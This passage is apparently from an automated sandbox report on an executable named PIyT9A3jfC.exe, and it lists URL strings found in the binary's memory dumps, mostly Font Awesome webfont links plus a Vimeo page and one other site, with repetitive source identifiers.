                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.eot?#iefix
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.svg#fontawesome
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.ttf
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-regular-400.woff2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.eot?#iefix
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.svg#fontawesome
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.ttf
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff
                  Source: PIyT9A3jfC.exe, 00000001.00000003.591320505.0000000003DC0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.707249278.0000000005320000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.711261081.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.589261694.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.592266018.0000000003DA0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.600552201.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717003151.0000000004190000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.705219127.00000000046A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717806396.0000000004100000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.590489760.0000000006210000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.708099580.0000000001580000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.709735434.0000000004BB0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.604339525.0000000003C30000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.595344456.0000000003D70000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.717209382.0000000004080000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.594022071.0000000003D70000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://use.fontawesome.com/releases/v5.12.0/webfonts/fa-solid-900.woff2
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.698413985.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.797618634.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.654246349.0000000003C30000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://vimeo.com/user202295058
                  Source: PIyT9A3jfC.exe, 00000001.00000003.702107735.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.702946761.0000000007702000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.807475792.00000000013C7000.00000004.00000020.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.714343191.0000000007702000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.11tochi.net/
                  Source: PIyT9A3jfC.exe, 00000001.00000003.645995536.00000000054C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.647675772.00000000050C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.630966820.0000000004A50000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.811803074.0000000003E00000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.802123476.00000000044E0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.803488319.00000000042A0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.800086645.00000000043B0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.687365221.00000000014C0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.758730892.0000000003CF0000.00000004.00001000.00020000.00000000.sdmp, PIyT9A3jfC.exe, 00000001.00000003.756557417.00000000052C0000.00000004.00001000.00020000.00000000.sdmp, 